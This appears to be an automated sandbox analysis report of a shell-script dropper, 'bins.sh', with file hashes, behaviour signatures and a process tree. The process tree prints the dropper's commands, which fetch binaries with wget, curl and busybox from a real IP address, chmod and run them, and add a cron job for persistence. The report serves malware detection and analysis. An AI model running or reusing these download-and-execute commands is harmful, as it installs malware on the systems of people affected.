Analysis

  • max time kernel
    124s
  • max time network
    154s
  • platform
    debian-9_mipsel
  • resource
    debian9-mipsel-20240226-en
  • resource tags

    arch:mipsel
    image:debian9-mipsel-20240226-en
    kernel:4.9.0-13-4kc-malta
    locale:en-us
    os:debian-9-mipsel
    system
  • submitted
    03-12-2024 00:29

General

  • Target

    bins.sh

  • Size

    10KB

  • MD5

    616244bb402bee04b6b45f703b80d324

  • SHA1

    eaddf7ee69008a10c656aba8958a6cecd0ba4f19

  • SHA256

    43fd86667e58eeb0e59922eb2aa6773f01cbd8c39235dc00904a1eb13230eccb

  • SHA512

    b1c3ac89ae943e25e2657353fa3f06f3fdc85f489cc965c7cbcc310357d75d0b1977fcd66b09aee06aaaf9986246d1c6ee29cda146aa773aaca3bfb1885857a4

  • SSDEEP

    96:82/zFBpXexFta6UdZrD1iyqAIg93GCk9Nbe/axFta6MfdG0rDNFoyqAIg9OWGCki:82/zFBpHxQOGCk9N9iGCk9N6Xz7

Malware Config

Signatures

  • Contacts a large (1601) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • File and Directory Permissions Modification 1 TTPs 1 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Executes dropped EXE 1 IoCs
  • Renames itself 1 IoCs
  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Creates/modifies Cron job 1 TTPs 1 IoCs

    Cron allows running tasks on a schedule, and is commonly used for malware persistence.

  • Enumerates running processes

    Discovers information about currently running processes on the system

  • Reads runtime system information 64 IoCs

    Reads data from /proc virtual filesystem.

  • Writes file to tmp directory 3 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/bins.sh
    /tmp/bins.sh
    1⤵
    PID:706
    • /bin/rm
      /bin/rm bins.sh
      2⤵
      PID:713
    • /usr/bin/wget
      wget http://216.126.231.240/bins/Uz08YNziENGeXipHM6OwCFU4FiNUF2eg70
      2⤵
      • Writes file to tmp directory
      PID:715
    • /usr/bin/curl
      curl -O http://216.126.231.240/bins/Uz08YNziENGeXipHM6OwCFU4FiNUF2eg70
      2⤵
      • Reads runtime system information
      • Writes file to tmp directory
      PID:730
    • /bin/busybox
      /bin/busybox wget http://216.126.231.240/bins/Uz08YNziENGeXipHM6OwCFU4FiNUF2eg70
      2⤵
      • Writes file to tmp directory
      PID:737
    • /bin/chmod
      chmod 777 Uz08YNziENGeXipHM6OwCFU4FiNUF2eg70
      2⤵
      • File and Directory Permissions Modification
      PID:739
    • /tmp/Uz08YNziENGeXipHM6OwCFU4FiNUF2eg70
      ./Uz08YNziENGeXipHM6OwCFU4FiNUF2eg70
      2⤵
      • Executes dropped EXE
      • Renames itself
      • Reads runtime system information
      PID:740
      • /bin/sh
        sh -c "crontab -l"
        3⤵
        PID:742
        • /usr/bin/crontab
          crontab -l
          4⤵
          • Reads runtime system information
          PID:743
      • /bin/sh
        sh -c "crontab -"
        3⤵
        PID:748
        • /usr/bin/crontab
          crontab -
          4⤵
          • Creates/modifies Cron job
          PID:749
    • /bin/rm
      rm Uz08YNziENGeXipHM6OwCFU4FiNUF2eg70
      2⤵
      PID:747
    • /usr/bin/wget
      wget http://216.126.231.240/bins/0xEPxt2PVsu2ZiKkeGcHvXIlF6ZQQOVDbC
      2⤵
      PID:767
    • /usr/bin/curl
      curl -O http://216.126.231.240/bins/0xEPxt2PVsu2ZiKkeGcHvXIlF6ZQQOVDbC
      2⤵
      PID:839

Network

MITRE ATT&CK Enterprise v15

Downloads

  • /tmp/Uz08YNziENGeXipHM6OwCFU4FiNUF2eg70

    Filesize

    151KB

    MD5

    6c583043d91c55aa470c08c87058e917

    SHA1

    abf65a5b9bba69980278ad09356e53de8bb89439

    SHA256

    2d63c81a782853efe672a1d9cb00a339ec57207b4075754a1baf1df9af466948

    SHA512

    82ee5f3884edc2cb3e68d8634353964cdb991e250b0592a2f80f5ffb738e64860abe6d030aec0d6ab94596c275b478080579fd65b055cc9055e1ef3de6dd59a5

  • /var/spool/cron/crontabs/tmp.n8RquO

    Filesize

    210B

    MD5

    dcb50a2d54adfabb396ceace37157f08

    SHA1

    efd13226e80511adb239ab33ab8c6b2d682aaaa7

    SHA256

    7bf6ec078c9c7b4ad5ab26741051adac4a1a400e90dccd07d0a0c805b4624194

    SHA512

    1e4783812e85aa84354c3924b6db8380020b9b238559570d848cf98c1178df9457fdaaf2ced66fb1aac375b851c082b2ac261a9fb125942ae678c9cdc6b73dce